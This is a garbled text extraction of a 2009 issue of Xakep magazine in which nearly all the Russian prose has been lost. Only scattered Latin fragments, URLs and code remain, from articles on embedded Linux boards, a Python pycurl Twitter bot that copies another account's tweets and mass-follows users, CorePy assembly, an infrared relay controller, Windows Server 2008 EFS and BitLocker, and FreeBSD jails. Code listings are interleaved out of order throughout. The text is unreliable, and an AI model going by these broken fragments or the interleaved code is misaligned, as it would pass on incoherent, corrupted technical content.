: Gnome VFS,
, ssh-, ISO-;
KDE KIO, ; fuse,
. ,
Inferno Plan9,

.
libferris (www.libferris.com),
Linux Symposium, .
, (Firefox, X
Window) , XML- ,
,
, .
, libferris
,
Plan9. z
083
>> unixoid
DIVER
/ DIVER@EDU.IOFFE.RU /
Linux
>> unixoid
GNU/Linux
. , , . ?
, , : Linux . ,
.
. ?
?
: Linux? , ,
. Linux ,
. ,
- ( D-Link MIPS-, Linux).
, .
- .
, 16 , MMU ( ), ucLinux.
,
.
. - , :
.
( ).
Datasheets .
(
Linux ).
? ,
, .

, ,
. , ,
.

, . SFR (Special Function Register). , .
084
, / , ,
.
Linux
:
1. PDC .
-
,
DMA ( ), , , . , PDC , .
2. Memory Management Unit (, -, ).
PDC .
,
. 86/86-64
, . Linux, ,
. - ,
, Linux.
NAND-Flash CompactFlash,
, , , MMU. , Ethernet
USB-Host .
, Linux,
, . :
,
,
, ,
.
, .
IBM-PC
BIOS, GRUB LILO.
Linux , X 04 /124/ 09
>> unixoid
AT91SAM9
, ,
.
-
( -,
).
, ,
, . .
, ,
, , (,
-
, ).
, . ,
.

. ,
GNU GCC toolchain,
, . GNU C
86- ,
embedded-, , , 86-. -. ARM7/9/11 , ,
GNUARM (www.gnuarm.com), AVR GNU AVR (
, gcc-avr),
51 SDCC ( Linux
).

mkfs.(_), gzip cpio.
. . -,
JTAG, .
. JTAG- LPT- (, , www.diygadget.com/store/buildingsimple-jtag-cable/info_12.html) .
JTSG , .
Linux
(DBGU) . ,
Linux .
DBGU-,
X 04 /124/ 09
RS-232 , COM- (, COM-

).
- , cu ckermit, -
MMU ,
, ,
, . :
AT91SAM9
Dataflash NANDFlash.
SAM-BA Boot ROM . read-only
0x00, ,
. ,
.
, . SAM-BA
,
Dataflash NANDFlash 4
SRAM . SAM-BA , 0x00
. 4-
Flash-
SDRAM, ,
. ,
ARM.
MMU ,
External Bus Interface, 256 ,
.
.
(4 ) . .
085
>> unixoid
Software Packages.

. , Atmel AT91SAM9
AT91 Bootstrap.
JFFS2, FAT,
Linux. .
Soekris net5501: , VPN-

COM-, .
, , Linux
-.
USB,
, , C2 ActiveSerial.
, , ,
. ,
- .
,
, - .
, - , NAND-.
( Linux )
.
,
. ,
Atmel AT91SAM9260, Linux,
- ,
Data NAND-Flash .
, , ,
,
SAM-BA Boot, , USB ,
usbserial-. , , Atmel,
.
JTAG-,
, .
Linux.

U-Boot (www.denx.de/wiki/U-Boot). .
, , ,
. , U-Boot
.
Atmel AT91SAM AVR32, linux4sam.org
avrfreaks.net. RedBoot,
, . ,
, ,
- :). ,
, -
086
, ,
Linux -
, ,
, , , .
,
EmDebian (www.
emdebian.org). Debian ,
,
. ,
HowTo, .
.
,
, U-boot RedBoot (www.emdebian.org/
tools/bootloader.html).
, , Debian. , , .
? , Embedded
Gentoo (www.gentoo.org/proj/en/base/embedded)! , , U-Boot.
, Linux from
Scratch, OpenEmbedded (www.
openembedded.org). , , build- BitBake
, ,
. ,
, ,
IPK, RPM, DEB tar.gz .
,
, , , . , OpenWrt
(openwrt.org),
. ,
opkg,
dpkg/apt.
sources.list
- - .
( !)
. MontaVista (www.mvista.
com) OpenMoko c Neo FreeRunner
(openmoko.org). , , ,
. Google Nokia
, Linux Android N810.
MMU, , ARM7. ucLinux (uclinux.org/ports)
.
( ), ucLinux .

,
. ,
, , ,
! z
X 04 /124/ 09
++++
>> coding
++++
++++
++++
SPIRIT
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
/ HTTP://TUTAMC.COM /

Twitter Pythone

TweetTornado. -
(tweettornado.com) . ,
100 !
, ex-USSR
. z ,
,
. 4 :
. ,
( , , ,
),
, .
;
;
;
.
Python Linux
, Windows 2.5 pyCurl.
.

.
, , .
, .
++ ++
++++
++++
++++
++++
TWITTER
,
.
. , Twitter (twitter.com)
,
140 . :
, ,
( following). ,
(followers), .
2006 , -
2007. 5 .
, ( ), ,
,

088
API
Twitter .
API, POST- GET- .
(apiwiki.twitter.com). :
URL ;
, ;
(POST GET);
;
.
, ,
. , ,
X 04 /124/ 09
>> coding
, ,
HTTP Basic Authentication.
xml
, .
API Python.
PYTHON CURL
HTTP-
, ,
cURL.
pycURL:
import pycurl
,
pycURL , .
, , ,
StringIO.
StringIO write,
. :
import StringIO
data = StringIO.StringIO()

API ,
:
import pycurl, StringIO
curl = pycurl.Curl()
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/update.xml')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
curl.setopt(pycurl.USERPWD,'spiritua:password')
curl.setopt(pycurl.POSTFIELDS,'status=TEXT')
curl.setopt(pycurl.POST,1)
curl.perform()
curl.close()
print data.getvalue()
, , .
spiritua:password , TEXT,
, .

, sys
:
import sys
pycURL , , xakep.ru. :
#
curl.setopt(pycurl.URL, 'xakep.ru')
#
curl.perform()
#
curl.close()
#
print data.getvalue()
, setopt,
. , ,
socks IP 192.168.1.1, 2222
.
curl.setopt(pycurl.PROXYTYPE,
pycurl.PROXYTYPE_SOCKS5)
curl.setopt(pycurl.HTTPPROXYTUNNEL,1)
curl.setopt(pycurl.PROXY, '192.168.1.1:2222')
X 04 /124/ 09
TEXT sys.argv[1].
:
sender.py "I love XAKEP"
, ,
. .
,
, ,
. ? , ?
.
, cron (
) .
. API , GET- http://twitter.com/
statuses/user_timeline/spiritua.xml. spiritua
. xml
, :). xml ,
089
++++
>> coding
++++
++++
++++
import re, sys, pycurl, StringIO

#
++++
# donor -
++++
,
'twitter.com/statuses/user_timeline/
donor.xml')
++++
++++
warning

!

.
.
++++
curl.setopt(pycurl.WRITEFUNCTION,
.
xml-, ,
<text>.
, :
data.write)
#
curl.perform()
# c
<text>(.*)</text>.
donor
donor = re.findall("<text>(.*)</text>",
Python
re
findall, . :
data.getvalue())
#
data.truncate(0)
# user
++++
import re
rez = re.findall("<text>(.*)</text>",data)
links
++++
++++
++++
++++
cURL

http://pycurl.
sourceforge.net.
http://apiwiki.twitter.
com
API .
www.python.org

Python.
++++
dvd
++++
++++
'twitter.com/statuses/user_timeline/user.
xml')
:
;
, , ,
, .
, .
,
, ,
.
, ?
,
:
curl.perform()
# c my
my = re.findall("<text>(.*)</text>",
data.getvalue())
#
if donor[0] not in my:
#
'twitter.com/statuses/update.xml')
#
curl.setopt(pycurl.USERPWD, 'name:passwd')
curl.setopt(pycurl.POSTFIELDS,
'status=' + donor[0])
http://python.su/
forum
.
++ ++
++++
,

,

.
090
curl.perform()

, ID
URL: http://twitter.com/friendships/create/
id.format
(format): xml, json
: POST
: id ,
ID ,
: http://twitter.com/friendships/
create/bob.xml
print 'one update posted'

else:
print no new updates
#
curl.close()
1) .
2) .
3) .
, ,
.
,
. ,
X 04 /124/ 09
>> coding
. ,
, . ,

, . API , , Get-
URL http://twitter.com/statuses/public_timeline.xml, 20
. , , , ,
.
<screen_name>,
:
<screen_name>(.*)</screen_name>.
20 ,
. , , , ,
,
:).
API, , Post- URL http://twitter.com/friendships/create/
spirit.xml, spirit .
Python,
( ):
'http://twitter.com/friendships/create/' + name +
'.xml')
curl.setopt(pycurl.USERPWD,'spiritua:passwd')
20 . , , , Cron
, , ( ) (,
, . ).
(
)
URL: http://twitter.com/statuses/update.format
(format): xml, json
: POST
: status ,
. URL- . 140 .
X 04 /124/ 09
, ,
.
, . ,
, , .
URL:
http://twitter.com/statuses/friends.xml
http://twitter.com/statuses/followers.xml
, :
# cURL
'http://twitter.com/statuses/friends.xml')
curl.setopt(pycurl.USERPWD,spiritua:passwd')
091
++++
>> coding
++++
++++
++++
++++
++++
++++
Eclipse
++++
friends = re.findall("<screen_name>(.*)</screen_name>",
friends)
followers = re.findall("<screen_name>(.*)</screen_name>",
followers)
++++
++++
, URL http://
twitter.com/friendships/destroy/spirit.xml. (
):
++++
++++
++++
++++
++ ++
++++
++++
++++
++++

TweetTornado
# time sleep
import time
curl.setopt(pycurl.POST, 1)
#
for friend in friends:
#
if friend not in followers:
#
'http://twitter.com/friendships/destroy/+
friend+'.xml')
curl.perform() # 2
time.sleep(2)
#
curl.perform()
# friends
friends = data.getvalue()
#
data.truncate(0)
# ,
'http://twitter.com/statuses/followers.xml')
curl.perform()
followers = data.getvalue()
friends, followers
xml, .
<screen_name>, :
092
.
, . , , ,
,
.
. , . - 3 .
, 3
, 100
. ,
- 2000 . ,
.
. z
X 04 /124/ 09
++++
>> coding
++++
++++
++++

/ ALEKSEY.CHERKES@GMAIL.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
Python CorePy
open source ,
. , , .
,
, .
. : Pythona.
, : ,
, , ,
. Python, , , .
, . ,
. Python
, ,
garbage collector! ,
,
, , ?
CorePy, .
CorePy Python, .
,
Python.
- Python-,
, C. , MMX SSE.
CorePy x86, x86_64 ( SSE),
PowerPC (PPC32 PPC64), VMX/AltiVec Cell SPU.
linux OS X. Microsoft Windows ;).
094
COREPY :
1) Instruction Set Architectures (ISAs). , .

(, x86 SSE).
2) InstructionStreams . 1.
.
3) Processors.
.
.

InstructionSream.
,
.
! , InstructionSream.
, . CorePy InstructionStream
.
, Processor.
!
- :
Python,
. .
, X 04 /124/ 09
>> coding
N ( 16 )
ASM-
SORT
, O N
(0 < N <= 1000).
!
0.8
core
psycho
trivial
sort
core
sort
0.7
(log) Timeline
0.6
Timeline
0.5
-1
-2
0.4
-3
0.3
-4
0.2
-5
0.1
0.0
0
2000
4000
200
400
600
N
800
1000
1200
. 0 < N <= 7000. ASM

,
SORT -
6000 8000 10000 12000 14000 16000

N
PSYCO-
, -

Title
core
psycho
trivial
sort
pshyco
trivial
1
(log) Timeline
Timeline
-3
200
400
600
800
1000
( ,
, ).
:
, , Python
;
, PsyCo;
;
sort, .
timeit. .
PyLab MatLab. , CorePy-, . ,
CorePy printer X 04 /124/ 09
-1
-2
00
-4
1000
2000
3000 N 4000
5000
6000
7000
.

NASM. ,
:). , , CorePy.
PsyCo Python-
z.
, CorePy
. x86
:).
. corepy.arch.*.isa ( * ).
,
. InstructionStream (
095
++++
>> coding
++++
++++
++++
++++
, CorePy

CorePy
# Platform: linux.spre_linux_x86_32
import corepy.arch.x86.isa as x86
BITS 32
import corepy.arch.x86.platform as env
SECTION .text
from corepy.arch.x86.types.registers import *
global bubble_sort
from corepy.arch.x86.lib.memory import MemRef
bubble_sort:
PROLOGUE:
++++
++++
code = env.InstructionStream()
push ebp
lbl_begin = code.get_label('BEGIN_ALL')
mov ebp, esp
lbl_loop = code.get_label('BEGIN_LOOP')
push edi
lbl_le = code.get_label('LE')
push esi
lbl_end = code.get_label('END_LOOP')
push ebx
is_finish = esi #
BODY:
x86.set_active_code(code)
BEGIN_ALL:
++++
mov esi, 0
# : -
mov ecx, 0
BEGIN_LOOP:
++++
++++
code.add(lbl_begin)
mov edi, dword [ebp + 8]
x86.mov(is_finish, 0)
mov eax, dword [edi + ecx * 4 + 0]
x86.mov(ecx, 0)
mov ebx, dword [edi + ecx * 4 + 4]
code.add(lbl_loop)
cmp eax, ebx
# edi
jle LE
# 4
mov esi, 1
x86.mov(edi, MemRef(ebp, 8))
mov dword [edi + ecx * 4 + 0], ebx
x86.mov(eax, MemRef(edi, disp=0, index=ecx, 4)
mov dword [edi + ecx * 4 + 4], eax
x86.mov(ebx, MemRef(edi, disp=4, index=ecx, 4)
inc ecx
# ...
cmp ecx, dword [ebp + 12]
x86.cmp(eax, ebx)
je END_LOOP
x86.jle(lbl_le)
LE:
++++
jmp BEGIN_LOOP
END_LOOP:
++++
x86.mov(is_finish, 1)
jne BEGIN_ALL
x86.mov(MemRef(edi, disp=0, index=ecx, 4), ebx)
EPILOGUE:
++++
cmp esi, 0
x86.mov(MemRef(edi, disp=4, index=ecx, 4), eax)
pop ebx
code.add(lbl_le)
pop esi
x86.inc(ecx)
pop edi
x86.cmp(ecx, MemRef(ebp, 12)) # ?
leave
x86.je(lbl_end)
ret
x86.jmp(lbl_loop)
++++
code.add(lbl_end)
code). add , :
++ ++
# ,
x86.cmp(is_finish, 0)
x86.jne(lbl_begin)
code.add(x86.mov(eax, 0)).
++++
++++
++++
++++
code eax.
. x86 ISA. code.add(),
x86.set_active_code(code)
ISA. code.
,
.
corepy.arch.x86.types.registers.
, : eax, bp .. :
. . is_finish esi.
096
, , .

. , x86
: , , , , .. . CorePy
MemRef ( ),
. : MemRef(0xABCD)
, MemRef(rip, -1024) ,
IP, MemRef(rsi, disp = 0, index = rcx, scale = 4)
= base + (index * scale) + disp (
). .
X 04 /124/ 09
>> coding
. Python .
,
. ,
CorePy, :
for i in xrange(0, 65): code.add(x86_isa.pop(edi))
, copy and paste, , 65 pop-, .

, ,
asm .
Emacs ,
,

. CorePy InstructionStream
: lbl_loop = code.get_label(LOOP).
lbl_loop , code . code
LOOP, . . :
code.add(lbl_loop) .
,
, . ,
, CorePy
: PROLOGUE, BODY
EPILOGUE. , , BODY.
. .
CorePy: ,
bp ..
CorePy .
Python- ExecParams.
: p1, p2, ... , p8
, .
Processor .
: . , ,
eax, : x86.mov(eax, MemRef(ebp, 16)).
. gp_return. ,

.
,
. , array
. Python.
, .
, ,
. array
buffer_info(),
. ,
. CorePy
extarray. array,
, .
.
, Linux huge pages,
X 04 /124/ 09
, !

,
.
.
N ( )
.
Python- PsyCo- .
, PsyCo , , ,
.
sort
sort
,
. , C,
. , , n**2, bubble sort :).
Python-
, CorePy
.
. , CorePy

. ,
,
:). , , . -
Python-, ,
, ( , ).
CorePy
.
: , ,
. ! z

import corepy.arch.x86.platform as env
proc = env.Processor()
params = env.ExecParams()
def sort(array):
bi = array.buffer_info()
params.p1 = bi[0]
params.p2 = bi[1] 1
proc.execute(code, params = params)# asm !
097
>> phreaking
VSHMUK
/ DIVER@EDU.IOFFE.RU /
>> phreaking
,
, , .
.
? .
.
, , . ,
. ?
,
.
: - ( ),
, - .
-, ,
, /. . , ,
. , ,
. ,
. , 36
, 38 40 . , .
, , ,
.
. ,

.
, .
, .
.
-, .
Atmel AT91SAM7X128.
ARM7.
:
USB-. , .
098
, , .
, , ,
8- ,
AT91SAM7X
. ,
, . , , :
, -;
,
. , - (
8- );
.
- . , /
. , Vishay TSOP18XX ( XX ).
5 3,3 , , ,
.
. ,
. Sony RM-836 36 , ,
TSOP1836, .

( , ). , 3,3
, 220 .
( relay ).
X 04 /124/ 09
>> phreaking
X 04 /124/ 09
099
>>
>> pc_zone
phreaking
+5V
,
~220V
,
.
-,
,
. -,
5 , 3,3 (
CMOS). ,
,
.
!
, , IRML2803
International Rectifier.
, .
KSD210AC8 Cosmo Electronics (http://
cosmo-ic.com/object/products/KSD210AC8.pdf). ,
, 4 , 5 12 ,
.
, - ( ), .
.
,
, ,
.
.
2-3 , , . ,
!
N-type
MOFSET
5 Ohm
MCU
.
, , -
.

. , , ,
. ,
, OUT GND
.
3
Control
Circuit
Input
PIN
Band
Pass
30
Denodulator
Vs
OUT
/ , ( =*, ?),
. ,
, :). ,
( )
(3,3 ), 220 .
- - ,
GND - . -
. . RC5 ( ), Philips, Sony, Sony.
,
,
.
(
( ,
). ,
). , 1 0,
, , , 0 1. Sony, RC5, .
, (!). , 1, , . -
, (,

, . , ,
, ). ,
. TTL (3,3-5 )
1-0-0, 1-0.
.
.
, .
MOSFET-
- , / , LSB/
, ( ).
, 25TTS
MSB - .
Vishay (http://www.vishay.com/docs/94384/94384.pdf). , ,
AGS
100
X 04 /124/ 09
>> phreaking
EFM
,
(, )
.
, / .

self-clocking .
, Manchester ( Ethernet) , ,
, .
, .
,
.
- CDROM, 8 14 , ,
, , , . , ,
,
( ) ( ) .
:
http://en.wikipedia.org/wiki/Manchester_code.
http://en.wikipedia.org/wiki/Eight-to-Fourteen_Modulation.
Google . ,
.
( pulse
space) , .
Sony , , .
0,6 , 4 ,
1+2 , 1+1.
:
0 (
, , ).
,
.
1. 2.4 .
, :
2.4 , ;
, - .
[!] , 0,
( ).
0.6 . , . 0.6, . -
, .
1.
,
X 04 /124/ 09
. 1.2 , ,
0.6 .
(LSB) [!].
7 , 5 .
40 ,

.
, , ,
(, ).
- . , .

ARM7.
, OUT-
, -,
. Datasheet 4.7
, .
-,
.
- , ,
.
!

. ,
, ,
, . ,
. -,
USB UART. ,
, . .
, ,
, , - . , ,
. ,
. , -. z
-
, , . ,

. , , , .
.
(), , - . ,

.
, ,
.
101
>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /
>> phreaking
, , ,
. , .
,
.
, - Apple
. ,
,
. ,

.
, , ,
, . ,
, .

http://www.xakep.ru/post/22867/default.asp.

. , , ,
.
- , , . ,
- -
. ,
-110.
0.1 . :
(1-1.5 ) 700 .
6 + 800 .
0 . ( )
, 200 .
-110 90 .
, , ,
. , , ,
. ? :
102
1890-
(http://www.mirf.ru/Articles/art716.htm),
. ! ,
, .
HL2?
, ,
. , , ,
.
. (, :)) .
,
. ? ,
.
( ).
? ,
, . , 15 ,
, ,
, . , ,
300 ,
.
,
. , .

, : ,
.
,
1515 , (,
). ,
X 04 /124/ 09
>> phreaking

. :
, , , .
,
, ! ,
,
10-15
. 10
5 . .

,
. ( -

,

, .
? . .) .
, .
, ? : .
, .
, ,
.

. , , .
, ,
, , , ,
. .
,
. , ,
. .
,
, .
, .
, ,
.

.
,
- .
, , , , ,
. , .
, ,
,
, . ,
.
.
.
, , , , ,
, .
,
,
.

, 100%
, . , , , , .
,
25% 15%.
, , . 50
.
X 04 /124/ 09
103
>>
>> pc_zone
phreaking

?
,

.
, .
:
.
,
,
. ,
,
( 10
mA) ,
10 .
. ,
,
,

.
,
.

,
10 /,
.
,
.
.

.
, , 10 .
,
.

,
.
.
. ,
,
. ,

,
.
, ,
104

, . ,

.
, ,
, .
.
,

.
. ,
, .

.
.
, 400
.
.
,
,
. ,

(,
300 20).

220 .
.
. ,
.
, , . ,
,
.

.

. ,
,
,
,
.
25-30 . , ,
, .
, . ?
: CRT-,
.
, .
, ,
, ,

( 900 ).
: ,
. , , , .
( 15%)
.

(
) , ,
. -

:
,
.. ,
,
,
.
.

.

,
, .
,
,
.
,
. ,

, ,
. .
,
, ,
,
-
.

? z
X 04 /124/ 09
>> phreaking
.
1. ,
.
2. .
3. .
4. .
5. (+) ,
(-). :
.
; ; .
X 04 /124/ 09
105
>> SYN/ACK
GRINDER
/ CORE@SYNACK.RU /
Win2k8:
>> SYN/ACK
, Win2k8, , -.
, ,
. ,
,
.
EFS
-
. Win2k8
, ,
. , ,
, . EFS (Encrypting File System), Microsoft,
Win2k. , . , Win2k8 -,
,
EFS,
.
Win2k8
AES 256- ( 3DES, DESX). . ,
EFS NTFS, / . FEK (File Encryption Key). FEK
- ( Win2k8
RSA 2048 ). DDF (Data Decryption Field, ) $EFS NTFS.
, , : , . , ,
. (
),

.
, EFS (, , -
106
FAT32), . .
EFS Win2k8 . (Advanced Attributes), .
(Encrypt contents to secure data) .
,
,
.
cipher.exe, EFS- .
. E () U () .
, cipher /?.
EFS ,
. ,
( ), .
, , . ,
, ,
:). , ,
.
EFS,
.
(Personal) (certmgr.msc).
EFS.
X 04 /124/ 09
>> SYN/ACK
, .
,
Trusted. , .
AD CS (Active Directory Certificate
Services).
.
EFS .
, .

, ,
, . ,
. .
(.pfx). ,

. certmgr.msc. ,
, .
BitLocker,
Vista, Ultimate/Enterprise, , EFS. ( Windows ,
). , , . , EFS,
BitLocker , .
AES 128- .
WMI (manage-bde.wsf)
256 . BitLocker , TPM (Trusted Platform Module). TPM-
, ,
, , .
BitLocker ,
, , , NTFS.
X 04 /124/ 09
,
( ) ,
Windows. ,
1.5 . , BitLocker . Microsoft
BitLocker Drive Preparation Tool (support.microsoft.com/
kb/933246).
, ,
, .
, TPM, . ,
Windows .

TPM, PIN- USB- .
, : TPM + PIN + USB-. TPM USB-.
TPM
, USB-
PIN-.
BitLocker , . Win2k8
. ,
BitLocker (BitLocker
Drive Encrypion). . :
> ServerManagerCmd -install BitLocker -restart
TPM,

TPM (tpm.msc). ,
, .
TPM . BitLocker
BitLocker (BitLocker Drive Encryption), . . ,
BitLocker (Turn On BitLocker)
(USB, ). BitLocker.
107
>> SYN/ACK
BitLocker ,

TPM BitLocker

info
.adm
.admx,

.admx
ADMX
Migrator,

Microsoft.
GPO Win2k3/
Win2k8
ADMX-.
Win2k8 ,

,
-.
BitLocker ,
.
EFS
, EFS
TPM, , ,
, BitLocker.

(gpedit.msc)
Windows
(Group Policy Object Editor Administrative Templates
Windows Component).
BitLocker (BitLocker Encryption)
:
.
BitLocker
TPM. TPM USB-. ,
,
gpupdate.exe /force.
Win2k8 BitLocker (BitLocker-RemoteAdminTool),
BitLocker . :
> ServerManagerCmd -install RSAT-BitLocker

, (Security Templates)
.inf. :
, (
108
, ,
, ),
, ,
. ,
user10
X Y, . ,
. ,
(Group Policy)
.
Win2k3 (
%systemroot%\security\templates) . , ,
, Secure*.inf-. Win2k8 ,
:
1. Defltbase.inf / .
2. Defltsv.inf , .
3. Defltdc.inf ,
.
: %systemroot%\inf ,
inf.
.
, , dcfirst.
inf .
X 04 /124/ 09
>> SYN/ACK
Win2k8
,
secedit.
, , MMC,
.
, .
,
, , .
, . , .
. ,
gpresult /v,
(RSOP).
GPO (Group Policy Objects), .
, . ,
, .
.

.

,
. *.inf . ,
,
.
MMC . , secedit GenerateRollback:
> secedit /GenerateRollback /CFG Defltsv.inf /
RBK Rollback.inf /log RollbackLog.log
X 04 /124/ 09
MMC
ADM/ADMX
( .adm) . ,
,
GPO, ( ).
ADM- , ,
(GPT). SYSVOL
. . , :).
Vista, Windows

XML .admx, . ADMX , GPO .
SYSVOL .
ADMX . ( ADM), ADMX
ADML. , ADM -,
.
. SYSVOL\Policies C:\Windows\PolicyDefinitions,
ADML- (
en_US ru_RU).
; .
ADM ADMX, ADMX ADMX Migrator, Microsoft. ADMX
XML-, , ADM. z
links
TPM

Wikipedia:
ru.wikipedia.org/wiki/
Trusted_Platform_
Module.

BitLocker (
)
AESCBC +
Elephant
go.microsoft.com/
fwlink/?LinkId=82824.

BitLocker
Microsoft BitLocker
Drive Preparation Tool
(support.microsoft.
com/kb/933246).

GPanswers.
com,
ADM/
ADMX.
109
>> SYN/ACK
J1M
/ ZOBNIN@GMAIL.COM /

FreeBSD Jail
>> SYN/ACK
FreeBSD
.
. jail,
, .

ftp-, , ,

,

You
are hacked!. , , ,
,
ftp-.
ftp-, ,

.

, .
: ,
.
( ),

,

.

, , ,
.
chroot(2),
110
,

. ,
/usr/chroot ( )
(
). , , ,

root, .
chroot,
,
, .
,
!
jail
chroot, ,
. , root
:
1. -
(, /dev/
kmem).
2. (
kern.securelevel kern.hostname).
3. .
4. .
5. .
6. raw ( ).
7. , IP- jail.
8. System V IPC ( ).
9.
ptrace(2).
jail , ,
,
.
, . ,
, .
,
.
,
jail, , ,
, . ,
,
( ).
, ,
,

.
. ,
.
X 04 /124/ 09
>> SYN/ACK
FreeBSD
Jail
1. JAIL-
/usr/src :
#
#
#
#
#
JAIL=/usr/jail/base
mkdir -p $JAIL
make world DESTDIR=$JAIL
make distribution DESTDIR=$JAIL
mount -t devfs devfs $JAIL/dev
/usr/jail/base

FreeBSD, /dev.
2.
. Jail- FreeBSD X 04 /124/ 09
IP-
, , -,
, , -, ,
IP
, jail.
IP- :
#
ifconfig
192.168.0.1/16
ed0
inet
alias
,
/etc/rc.conf:
# echo "ifconfig_ed0_alias0=\"inet
192.168.0.1\"" >> /etc/rc.conf
,

IP-, (10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/16), .
.
- jail IP-,
,
IP-.
,
(, ssh
).
111
>> SYN/ACK
info
ipfw
fwd,

IPFIREWALL_
FORWARD.
,
jail

FreeBSD-.
!
, jail-
:
# echo "inetd_flags=\"-wW -a <IP-
>\"">> /etc/rc.conf
, (rpcbind, nfsd, mountd)

IP-,
jail- . IP-
, jail- .
( ssh):
# ipfw add fwd 192.168.0.1,22 tcp from any to
-ip 22
sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
sshd_enable="YES"
, , ,
exit <Ctrl+D>.
IP- ,
. jail
IP, , ,
, DNS-.
ssh- jail-, , ? PREFIX :
# make PREFIX=/usr/jail/base make install clean
3. JAIL-
jail- FreeBSD
/etc/rc. jail
, . :
# jail /usr/jail/base base.jail 192.168.0.1 /
bin/sh
:
1. fstab (touch /etc/fstab), .
2. (passwd
root) , , .
3. (newaliases),
sendmail.
4. (tzsetup).
5. /etc/resolv.conf , , jail, DNS-. -, DNS-.
6. /etc/rc.conf :
:
# pkg_add -P /usr/jail/base -1.0.0.tbz
portinstall:
# PREFIX=/usr/jail/base portinstall -P
,
. , jail-

FreeBSD, , .

, .
jail-.
, .
unionfs nullfs /
usr/ports :
# mount_unionfs /usr/ports /usr/jail/base/usr/ports
# vi /etc/rc.conf
// jail-
hostname="base.jail"
// ( )
network_interfaces=""
// /
112
# mount_nullfs /usr/ports /usr/jail/base/usr/ports
4. JAIL-
,
X 04 /124/ 09
>> SYN/ACK
Man jail: jail
jail-. /etc/
rc.conf :
# vi /etc/rc.conf
jail_enable="YES"
// jail-
jail_list="base"
// jail
jail_base_rootdir="/usr/jail/base"
jail_base_hostname="base.jail"
jail_base_ip="192.168.0.1"
jail_base_interface="de0"
//
jail_base_exec_start="/bin/sh /etc/rc"
jail_base_exec_stop="/bin/sh /etc/rc.shutdown"
// ?
jail_base_devfs_enable="YES"
jail_base_fdescfs_enable="NO"
jail_base_procfs_enable="NO"
, jail,
loopback-
,
. , , nginx,
reverse-proxy, jail. , apache, 8080. :
nginx, 80- apache. apache, nginx
jail. ?
nginx ( bash):
#
#
#
#
JAIL=/usr/jail/nginx
mkdir -p $JAIL
cd /usr/ports/www/nginx
make PREFIX=$JAIL install clean
, nginx :
# ldd $JAIL/sbin/nginx
/usr/jail/nginx/lib:
:
# /etc/rc.d/jail start base
jail- /usr/
sbin/jls. , , ps
top. J.

jail-, .
. , , ,
,
. ,
,
, , ssh-
. ,
?
,
, , . ,
, , , ,
ls, cd sh.
X 04 /124/ 09
# mkdir -p $JAIL/lib
# LIBS='ldd $JAIL/sbin/nginx|grep -v ':$'|cut -f 3 -d " "'
# for LIB in $LIBS; do cp $LIB $JAIL/lib; done
, ld-elf.so.1,
:
#
#
#
#
mkdir -p $JAIL/libexec
cp /libexec/ld-elf.so.1 $JAIL/libexec
mkdir -p $JAIL/var/run
ldconfig -s -f $JAIL/var/run/ld-elf.so.hints $JAIL/lib
www:
# echo 'www:*:80:80::0:0:World Wide Web Owner:/
nonexistent:/usr/sbin/nologin' > $JAIL/etc/passwd
# cp $JAIL/etc/{passwd,master.passwd}
# pwd_mkdb -d $JAIL/etc $JAIL/etc/master.passwd
# echo 'www:*:80:' > $JAIL/etc/group
, :
# mkdir -p $JAIL/var/{log,tmp/nginx}
# chown 80:80 $JAIL/var/tmp/nginx
113
>> .PRO
SYN/ACK
nginx
Nginx (engine x) HTTP- . HTTP-,
apache,
. wordpress.com
. 2002- .
# mkdir $JAIL/{dev,tmp}
# chmod 7777 $JAIL/tmp
devfs:
# mount -t devfs devfs $JAIL/dev
sysctl,

1 security.jail.set_hostname_allowed jail- (hostname) jail-.

,
, DNS-. 2 security.jail.allow_raw_sockets
jail- raw-.
,
, .
3 security.jail.chflags_allowed jail- (chflags). ,
jail , .
IP- HTTP- IP- :

# ifconfig ed0 inet alias 192.168.0.1/16
# ipfw add fwd 192.168.0.1,80 tcp from any to -ip 80
nginx server :
# vi /usr/jail/nginx/etc/nginx/nginx.conf
server {
listen 80;
server_name www.host.ru;
location / {
proxy_pass http://127.0.0.1:8080/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_
forwarded_for;
client_max_body_size 10m;
client_body_buffer_size 128k;
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}
}
,
nginx, /usr/jail/nginx.
, include mime.types; include /etc/nginx/mime.types;. ,
nginx ( -c ):
# jail /usr/jail/nginx nginx.jail 192.168.0.1 /sbin/nginx
-c /etc/nginx/nginx.conf
114
nginx , /etc/rc.conf
:
# vi /etc/rc.conf
ifconfig_ed0_alias0="inet 192.168.0.1"
jail_enable="YES"
jail_list="nginx"
jail_nginx_rootdir="/usr/jail/nginx"
jail_nginx_hostname="nginx.jail"
jail_nginx_ip="192.168.0.1"
// ,

jail_nginx_exec_start="/sbin/nginx -c /etc/nginx/nginx.
conf"
// nginx ,
jail
kill
jail_nginx_exec_stop=""
// devfs
jail_nginx_devfs_enable="YES"
jail_nginx_fdescfs_enable="NO"
jail_nginx_procfs_enable="NO"
, .
, ( ,
sshd, , ldd
, lsof). /dev.
,
, , devfs. /etc/defaults/
devfs.rules devfs jail. , /dev/
null /dev/random, . , /etc /etc/rc.conf :
jail__devfs_ruleset="devfsrules_jail"
, devfs.rules
, .
man- devfs(8) devfs.rules(5). z
X 04 /124/ 09
>> SYN/ACK
SERGEY JAREMCHUK
FEAT ANDREY MATVEEV
>> SYN/ACK
IP-PBX Asterisk
Asterisk IP-,
.
Asterisk ,
. , , .

Asterisk ( ) () . ,
:
1. Call- , .
2. API ( 5038)
telnet, .
3. CLI (command line interface)
( asterisk -r).
4. FollowMe.
.call. /var/spool/
asterisk/outgoing ( asterisk.conf astspooldir),
. Call- . Asterisk
; , , .
Call-. autoload=yes (
) modules.conf. extensions.conf,
. , ,
Asterisk
Motion (www.lavrsen.dk/twiki/bin/view/Motion/WebHome),
.
, , . Asterisk :
SIP- (X 04 /124/ 09
). Motion
